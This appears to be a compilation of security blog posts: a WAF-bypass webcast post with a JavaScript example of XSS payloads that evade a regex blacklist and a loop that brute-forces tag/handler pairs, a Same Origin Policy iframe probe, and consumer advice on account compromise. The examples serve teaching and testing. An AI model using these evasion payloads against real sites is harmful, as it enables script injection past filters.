
Hacking and Cracking


Bypassing Modern WAF's Exemplified At XSS (Webcast)

Posted: 03 May 2016 02:41 PM PDT



Last Saturday, I conducted a webcast on Garage4hackers on one of my favourite subjects in information security, WAF bypass. Initially, I had decided to present something on mobile browser security, a topic I have recently been researching.

However, I later realized that the takeaways would not be very useful, so I decided to talk about something that bug hunters and pentesters can use in their day-to-day pentests and security engagements, and hence I chose this topic.

I must admit that the response has been overwhelming; along with it, I have also had the chance to learn more from the feedback and the CTF responses.

I would like to specially thank ImdadUllah, Himanshu and Sandeep, along with the other Garage4hackers members, for inviting and supporting me throughout the journey. One of the best things about the G4H community is the work they are doing for the security community by conducting webcasts free of cost. You can find a list of other webcasts here: http://www.garage4hackers.com/ranchoddas/

Abstract

Over the years, a clear trend has emerged in the information security landscape: web applications are under attack. Given this, Web Application Firewalls (WAFs) have become increasingly popular and are commonly deployed by organizations to protect against attacks such as SQL injection and XSS.

While WAFs may help prevent application-layer attacks to some extent, they are certainly not a replacement for input validation and secure coding practices, because they are based on blacklists: known-bad patterns are rejected and everything else is allowed through. The problem, especially in the case of JavaScript, is that it is simply not possible to write a blacklist that blocks every malicious pattern without generating false positives, given the dynamic nature of JavaScript and the practically infinite ways of obfuscating a payload. Output encoding at the point where untrusted data is written into the page, by contrast, does not depend on recognising the payload at all.
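As an added example (not code from the webcast or from the G4H CTF), the toy blacklist below shows the blacklist problem concretely: four rules of the kind a regex-based WAF ships, three payloads those rules catch, three equivalent payloads that slip past them, a small brute-force search over tag/handler pairs the rules never mention, and the HTML output encoding that makes every one of them inert regardless of what the blacklist does. The rules, payloads and tag/handler lists are constructed for illustration and are not taken from any real product.

```javascript
// Added example, not code from the webcast or the G4H CTF: a toy blacklist
// "WAF" of the kind the abstract describes, the payloads that slip past it,
// and the contextual output encoding that makes the blacklist unnecessary.
// The rules below are constructed for illustration, not any vendor's ruleset.

const BLOCKLIST = [
  /<script/i,                     // <script>, <SCRIPT>, <script/src=...
  /javascript:/i,                 // javascript: URLs in href/src
  /\bon(error|load|click)\s*=/i,  // the three handlers everyone blacklists
  /\balert\s*\(/i,                // the canonical proof-of-concept call
];

// true when the toy WAF would reject the request parameter.
function wafBlocks(input) {
  return BLOCKLIST.some((re) => re.test(input));
}

// Classic tricks that a case-insensitive regex still catches...
const caughtPayloads = [
  '<SCRIPT>alert(1)</SCRIPT>',
  '<img src=x onerror=alert(1)>',
  '<a href="javascript:alert(1)">x</a>',
];

// ...and variants that defeat each rule without changing what the browser does.
const bypassPayloads = [
  // handler not on the list; tagged template call, so there is no "alert("
  '<svg onmouseover=alert`1`>',
  // HTML entity inside an attribute: the parser decodes it to "javascript:",
  // a WAF matching the raw bytes never sees that string
  '<a href="java&#x73;cript:alert`1`">x</a>',
  // tag/handler pair the list never mentions; fires on its own when opened
  '<details open ontoggle=confirm`1`>',
];

// "Brute forcing": enumerate tag/handler pairs and keep the ones the rules
// miss. Real engagements use far longer lists; these few are enough to show
// why a handler blacklist can never be complete.
const TAGS = ['img', 'svg', 'body', 'details', 'input'];
const HANDLERS = ['onerror', 'onload', 'onmouseover', 'ontoggle', 'onfocus'];

function discoverBypasses(tags = TAGS, handlers = HANDLERS) {
  const found = [];
  for (const tag of tags) {
    for (const handler of handlers) {
      const candidate = `<${tag} ${handler}=confirm\`1\`>`;
      if (!wafBlocks(candidate)) found.push(candidate);
    }
  }
  return found;
}

// The actual fix: encode for the HTML text context at the output point.
// Every payload above becomes inert text, whatever the blacklist says.
function encodeForHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

for (const p of caughtPayloads.concat(bypassPayloads)) {
  console.log(wafBlocks(p) ? 'blocked ' : 'bypass  ', p);
}
console.log(discoverBypasses().length, 'tag/handler pairs slip past the rules');
console.log('encoded:', encodeForHtml(bypassPayloads[0]));
```

Run it with node. The point of discoverBypasses is that extending the handler list does not help: the attacker needs only one tag/handler pair, or one encoding, that the regex author did not think of, whereas encodeForHtml only needs to know which context the data lands in.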

In this webinar we will talk about various techniques that can be used to bypass WAFs, such as brute forcing, regular expression reversing and browser bugs. The webinar would mostly discuss

Prerequisite

- Basic knowledge of HTML/JavaScript

- Basic know-how of XSS attacks

Webcast 


CTF Competition

After the webinar, we had a CTF challenge made by a friend of mine, FileDescriptor. Certain parts of the first two challenges are based on characteristics of a real-world WAF that I encountered in the wild, combined with FD's ideas to make up the challenge. The last challenge is based on @FileDescriptor's unique idea and hence is not easy to crack, so we named it "Hard".

CTF Link :http://92.222.71.224


Bypassing Browser Security Policies for Fun and Profit (Full Presentation Video)

Posted: 21 Apr 2016 11:02 AM PDT


Black Hat has just released the full video of my talk on browser security. If you wish to read the whitepaper and slides or download the SOP test suite, refer to my previous post, "Bypassing Browser Security Policies For Fun And Profit".


Abstract

Mobile browsers, in comparison to desktop browsers, are relatively new and have not undergone the same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that works under all circumstances. This leaves us with the "other" category of client-side attacks. In this presentation, we will present our research on bypassing core security policies implemented inside browsers, such as the "Same Origin Policy" and "Content Security Policy".

We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research, such as address bar spoofing, content spoofing, cross-origin CSS attacks, charset inheritance, CSP bypass and mixed content bypass, as found in Android browsers. We will also talk about the testing methodology we used to uncover several Android zero-days. Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of the security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers and in Android WebView itself.

We will explain the root cause of each bug and demonstrate its exploitation, show examples of vulnerable code and, where possible, the patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web browser.


How Much Do Hackers Know About You?

Posted: 13 Apr 2016 07:07 AM PDT


The threat of black hat hackers has never been greater than now, considering the increasing organization of their efforts to make a dollar off of your digital assets and information. The common portrayal of the hacker is someone who knows enough about programming and the internet that they can seemingly access any information or know anything about anyone.

This is mostly an exaggeration. Finding information on someone is still work, sometimes very time-consuming, and usually not worth the effort financially unless done at scale. It does raise the question, however, of how much hackers might know about you. Based on the trails you leave online and who you trust with your information, a hacker might already have a file with your name on it. It is a question worth investigating.


The answer is different for every person. Here are some factors you need to take into consideration:

Public Network Usage

How often do you use public networks to conduct online transactions or communicate with others? If you use them at all without protection, you leave yourself open to data interception. Hackers will often sit in cafes or other public places with Wi-Fi and use a "sniffing" tool to capture the traffic of anyone unfortunate enough to be sending and receiving data over the network. Think back to what you've sent over a public network. Anything you sent or received in the clear, over plain HTTP rather than HTTPS, could very well be in the hands of a hacker.

The best way to protect yourself on a public network (other than not using it) is to equip your device with a reputable Virtual Private Network (VPN). A VPN tunnels your device's traffic to an offsite server over an encrypted connection, so anyone watching the local network sees only ciphertext. As an added benefit, your IP address is masked by that of the VPN server, so you avoid being tracked that way as well. Bear in mind that the VPN provider itself can see the traffic that leaves its tunnel, so you are moving your trust from the cafe's network to the provider, not removing it.

Large Scale Data Breaches

Do you know whether your information has been leaked in a large-scale data breach such as the Office of Personnel Management attack or the Target credit card breach? If so, you might not have been targeted immediately, but that doesn't mean the information has vanished from the internet. For the right price, that data (or large data sets containing your information, at a wholesale price) can be sold to an interested party. Some of it may be out of date, but with the right pieces you could still be traced.

To prevent this sort of thing in the future, the most you can do is choose carefully which organizations you trust with your information. Try to lobby for stronger cybersecurity standards with the businesses you use and with the government. You can't control organizations, but you can control whom you trust.

Has One Account Been Compromised?

Much like dominoes, the breach of even one of your accounts can lead to a loss of other accounts linked to it or sharing data. Try to imagine what would happen if someone else had access to your email account. They would likely need only an hour to completely ruin your online life, should they want to. One social media account breach could easily lead a hacker to copy all of your conversations and scan them for private information. They might not even read it until the time is right to scam or blackmail you.

Think back and ask yourself if even the most minor of your accounts has been compromised. If so, ask yourself how long ago the incident took place. Look more into the data you could have lost at that time and whether it still is relevant today (some will be). Remember that in addition to financial information, the names of friends and family members could be linked with your accounts.

What Do You Keep on Your Computer?

Much of what black hat hackers do involves malware and using it to gain information about you. While some malware is ransomware or a downloader that opens the door for other malware, other malware (or the same malware, as a secondary function) collects whatever information it can from you and sends the data on to its operator.

If you've ever been the victim of malware, a lot of what you keep on your computer could be known by a hacker. Make sure that you try to avoid shady websites and use the best tools you can such as a high quality security suite to keep malicious programs off of your precious devices.

Privacy and Social Media Presence

Even if you keep your social media accounts safe, a hacker could use them to find out important information about you. Privacy is important to fend off malevolent hackers in a world of sharing.

Consider the following:

  • If you tag your location in a public post often enough, they might be able to get a general idea of your routine.
  • If you don't make your accounts as private as possible, a clever hacker might be able to use your public communications with your friends against you and deduce some of your movements and activities.
  • Even things such as the time of day you post can say a lot about you. A skilled hacker can use even basic information like this to plan a more convincing scam.
  • Doing a quick Google search of yourself online is a great way to determine how private you are online. If you can find it out through Google, have no doubt a hacker can find out the same information.

This is clearly a difficult question to answer for certain, but hopefully by this point you have a better idea of what to look out for and what a hacker could know about your personal life and what information they could have. You aren't defenseless, but further vigilance regarding all of your online activities is required.

Do you think there are any other factors to consider when trying to figure out how much a hacker could potentially know about you? Are there any other tools and methods of protections you would recommend? Please leave a comment below with your thoughts on the matter to continue this conversation.

About The Author

Cassie is a cyber security enthusiast who writes for SecureThoughts and understands that hackers will do anything they can to get information on anyone they can. The more you know, the better you can protect yourself, and ultimately that is her goal: to help others learn how best to protect themselves.


Bypassing Browser Security Policies For Fun And Profit (Blackhat Asia 2016)

Posted: 31 Mar 2016 11:52 AM PDT



A few hours ago, I delivered a talk at Black Hat Asia 2016 on "Bypassing Browser Security Policies For Fun And Profit". The talk covered a wide variety of topics, from SOP bypasses to CSP bypasses and so on. Due to limited time I was only able to cover a few of them; however, you can find the rest in the whitepaper below. The following was the abstract:


Abstract


'Mobile browsers, in comparison to desktop browsers, are relatively new and have not undergone the same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that works under all circumstances. This leaves us with the "other" category of client-side attacks. In this presentation, we will present our research on bypassing core security policies implemented inside browsers, such as the "Same Origin Policy" and "Content Security Policy".

We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research, such as address bar spoofing, content spoofing, cross-origin CSS attacks, charset inheritance, CSP bypass and mixed content bypass, as found in Android browsers. We will also talk about the testing methodology we used to uncover several Android zero-days.

Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of the security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers and in Android WebView itself.

We will explain the root cause of each bug and demonstrate its exploitation, show examples of vulnerable code and, where possible, the patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web browser.'


WhitePaper




To download the Whitepaper, please click here.

Slides


To download the slides, please click here.

SOP Bypass Mini Test Suite v 1.0 Beta


As promised in my talk, I am making the test suite available on my blog. It contains over 40 test cases that have proven to work against different mobile browsers in my research, for testing Same Origin Policy bypass issues in browsers. Due credit has been given to the researchers whose proofs of concept have been incorporated into this test suite. Please note that this is just the beta version; the next version will have more test cases, and we will try to automate the execution and result collection of all the test cases.

To download the SOP Bypass Mini Test Suite, please click here.
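As an added example that is not part of the author's SOP Bypass Mini Test Suite, the block below shows the two pieces any such test case needs: the (scheme, host, port) origin comparison the Same Origin Policy rests on, including the edge cases (default ports, host case, userinfo) where hand-rolled comparisons usually go wrong, and one probe that frames a document from another origin and checks that the browser refuses the read. VICTIM_URL is a placeholder, not a real target; the probe is assumed to be served from some origin other than the victim's.

```javascript
// Added example, not part of the author's SOP Bypass Mini Test Suite: the
// origin comparison the Same Origin Policy rests on, and one probe in the
// shape a test case in such a suite takes. VICTIM_URL is a placeholder, not
// a real target; the probe page is assumed to be served from another origin.

const VICTIM_URL = 'https://victim.example/secret.html'; // placeholder

// An origin is the (scheme, host, port) triple. The URL parser already
// lowercases the host and drops a scheme's default port, so "http://a.com"
// and "http://A.com:80/x" compare equal; userinfo, path, query and fragment
// play no part in the comparison.
function isSameOrigin(a, b) {
  const ua = new URL(a);
  const ub = new URL(b);
  return ua.protocol === ub.protocol
    && ua.hostname === ub.hostname
    && ua.port === ub.port;
}

// One SOP test case: frame the victim document and try to read it. A correct
// browser throws a SecurityError on the contentWindow.document access
// (cross-origin frames are still allowed to *load*, so onload fires either
// way). If the read succeeds, the browser under test has a SOP bypass.
function probeFrameRead(victimUrl) {
  return new Promise((resolve) => {
    const frame = document.createElement('iframe');
    frame.src = victimUrl;
    frame.onload = () => {
      let result;
      try {
        const html = frame.contentWindow.document.documentElement.outerHTML;
        result = { bypass: true, leaked: html.slice(0, 80) };
      } catch (e) {
        result = { bypass: false, error: e.name }; // expected: "SecurityError"
      }
      frame.remove();
      resolve(result);
    };
    document.body.appendChild(frame);
  });
}

// The probe needs a DOM; under node only the origin comparison can run.
if (typeof document !== 'undefined') {
  if (isSameOrigin(location.href, VICTIM_URL)) {
    console.log('serve the probe page from an origin other than the victim');
  } else {
    probeFrameRead(VICTIM_URL).then((r) => console.log('SOP probe:', r));
  }
} else {
  console.log('same origin?', isSameOrigin('http://a.com', 'http://A.com:80/x'));
}
```

Loading the script from a page on a different origin than VICTIM_URL runs the probe; a result with bypass false and error "SecurityError" is the pass case. Note that a victim page sent with X-Frame-Options or a frame-ancestors CSP directive will not render in the frame, but the onload event and the SecurityError still occur, so the test case remains valid.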

Should you have any questions, feel free to ask.



Facebook Account Hacked! What To Do Now?

Posted: 17 Jan 2016 09:12 PM PST


Every single day I get emails in my inbox and on my Facebook page from users asking how to recover a hacked Facebook account, and a common problem I see in all of them is that they are not proactive. Everyone searches for Facebook account recovery software, Facebook hacking software and recovery mechanisms only after their Facebook or other email account has been hacked. In this article, Gary suggests methods to identify whether your computer or email account has been hacked, and what you can do after your Facebook account has been hacked.

In today's digital world, it is unfortunately not uncommon for an account or machine to become compromised by an attacker for nefarious purposes. During your searches for a step-by-step solution, your frustration may hit the breaking point, as you scroll through page after page, listing preventative measures that it may already be too late for. No problem. In today's article I will outline simple strategies that should get you back in control of your online accounts and devices after a breach is suspected or confirmed. These instructions will be laid out in a manner that should be quite easy for an average user to comprehend and execute. But first, let's take a minute to understand exactly how this probably happened in the first place.

NOTE: If you are potentially dealing with this situation right now, please skip ahead to the " What do I do?" section of this article, first. Then be sure to read the rest.

Did I Get Hacked?

You're browsing around online and suddenly your friends on social media are asking you what these links you keep sending them are, or perhaps your password to an online account has been changed, emails are being sent from your email account, or there is just something strange in your activity log. Do any of these mean that your account has been compromised?

First of all, when in doubt, always assume your account and system have been compromised and take the appropriate measures to secure them. Do not let an attacker keep a foothold and continue masquerading as you and/or stealing your sensitive data and files while you come up with excuses to justify unfamiliar activity. Also, while many online services and accounts have a 'connected devices', 'location information' or 'login activity' viewer in their settings, this should never be relied on as a sure-fire way to rule out being hacked. There are many ways these features can be rendered useless: malware on the user's machine can set up an HTTP or SOCKS proxy so that the attacker's logins appear to come from the victim's own device and IP address, session cookies can be stolen and reused without any new login being recorded, and the online account settings themselves can be manipulated, or be flawed, so as to hide malicious activity. Secure your accounts and system anyway, just to be safe. It may be time-consuming, but it is far better than waiting around for something bad to happen.

How Does This Happen (Methods To Hack Facebook Account)?

There are many methods which attackers deploy to breach online accounts of their victims. This is not meant to be an instruction manual or even a comprehensive list of every way an attacker can possibly compromise your system, accounts, and/or online services. This is just an overview of the most common real-world techniques that are actually being deployed. If you've been hacked, chances are good that it was done by a combination of the techniques listed below.

There are man-in-the-middle attacks, which capture data packets from the victim machine and store them before sending them along to the proper destination. There's phishing, where an attacker convinces you to sign in to your account via a fake login page, then steals your credentials. Sometimes websites themselves are hacked via SQL injection, dumping the entire database of usernames and password hashes; these same username/password combinations are then tried on many other sites (credential stuffing), since a lot of users reuse the same login credentials across many websites and services. Then there is potentially the most dangerous: malware installed on the victim machine, which can do anything from logging keystrokes, to remotely browsing the filesystem, to opening a remote shell, or even spying on users via their webcams and microphones.

The malicious hacker's toolbox of techniques is always evolving and changing to meet changes in security practice and while there are other ways accounts can be compromised, most real-world hacks are a combination of some of the techniques listed above.

"What Do I Do?"

I would like to divide this into three sections, as each are important. Secure Your Accounts and Services, Secure Your Machines and Devices, and Damage Control. You don't know for sure how much of a foot-hold an attacker has or how long they have had it, before you realized or became suspicious. So assume everything has been compromised and secure each of them, as they may be used by an attacker to later re-compromise what you have secured.

Secure Your Facebook Accounts and Online Services

You must change the passwords to all your online accounts and services that you use. Even the ones that you don't recall using sensitive data on. This practice should obviously be prioritized, beginning with the account that you notice suspicious activity on.

Then quickly change your associated email accounts, as these can usually be used to reset the passwords to your other accounts. Be sure to 'logout active sessions' or connected devices, if your service has this feature. If so, you will probably be asked or prompted with it, during the password reset process.

Do not use the same password across different sites or services. Go to the security settings of each site or service and activate every notification you possibly can for login attempts and activity. Enable two-factor authentication. Make it a pain in the ass to log in if you must. Remember that ease of use and convenience are simply open doors for many others.

Then, after you have secured your devices, go through and do a final sweep of password changes. This final step is due to the fact that, if malware is installed on your device, an attacker could potentially be watching you change all your passwords the first time.

Also, follow your website, social media, or other online service's specific guidelines for reporting unusual behavior and securing your accounts. They most likely have a staff that deals with these situations on a daily basis, are usually very polite and helpful and there should never be any negative consequences if you are in error in your reporting of a hacked account.

Secure Your Devices

We must next purge your devices of any malicious processes. There are usually many free antivirus solutions that do a great job at eliminating these threats in a simple scan, but don't be scammed by a fake. Do your research for the latest, well known and best free or paid (depending on your budget) anti-malware solution. Read third party reviews.

Now, I know that anti-virus protection is not always a 100% solution, as there are many obfuscation and crypting methods that can be used to hide malware signatures from antivirus scans, but the big antivirus companies are very competitive and new definition updates roll out on a regular basis. At the time of writing, the average private crypter keeps a sample FUD (fully undetectable) for approximately one month, and the average public crypter that actually achieves FUD (most never do, from the beginning) keeps it so for only about one or two weeks.

While an anti-virus scan will most likely eliminate the threats on your PC, it is still advised that you backup your important files and data, format your hard drive and reinstall your operating system. For devices other than PC, follow your manufacturer's guidelines for resetting your device to default factory settings.

Damage Control

An often overlooked aspect of securing your accounts and services is what to do afterward. It is important, because you may not know what messages have been sent to others or what was done in your name.

Financial services should be your first concern. Check your account activity for any purchases you do not recognize. Be sure to call your bank or credit card companies and have new card numbers issued.

As for social media, don't be embarrassed or ashamed to post a public announcement, for everyone to see. Most everyone has seen social media accounts having been taken over by an attacker or bot and posting malicious links all over the internet, already. These things happen all of the time. This is nothing new and people will not think of you as being stupid or view you in a different light. They will instead judge you based on your quick and calm ability to assess and take control of the situation, most likely awarding you with support and respect.

For formal or social media accounts, a statement like this should be sufficient:

"Hello Everyone. I have an important and unfortunate announcement to make. It appears that some of my accounts were compromised (hacked). I noticed suspicious activity on (date XX/XX/XX ) and while I am actively securing everything and the damage seems minimal, there's no way for me to know the full extent or length of time of the breach. If you noticed any suspicious activity from my account or strange messages, please inform me immediately. Also if you have gotten any links from "me" recently, do not follow them. Instead ask me about them after I have finished securing all of my accounts, devices and services. I appreciate your support. Have a great day, everyone and apologies if there has been any inconvenience."

A shorter version:

"One of my accounts was recently hacked. Things seem fine so far. I'm now securing it. Be sure to let me know of anything suspicious from my account. Thanks."

And last, but not least: prevention. This could've saved you a lot of effort and grief to begin with. Keep up to date with the latest security practices for all of your online services, all your accounts, and all of your devices, because often a foothold into one of these can allow access into others.





About the Author


My name is Gary Lewis. While I am not as knowledgeable and skilled as many of your programming and security experts and teachers, I do have real-world experience. There are a lot of technical skills I'm not an expert at, but I was involved in a lot of things I will not list here, and I do know how hacks are being done in the real world, rather than from textbook knowledge. I retired from that scene some time ago and decided to pursue philosophy, art and poetry. Currently, I am working on three series of dark-themed art and poetry books entitled Paradoxium, Inevitum and Relativium, about Chaos, Order and Time. I still stay up to date on data security and am happy to write an article for my good friend Rafay when he wishes, but my days of hacking are over. So if you have any questions or inquiries, please refer to him and his team. They are very knowledgeable in their field of study.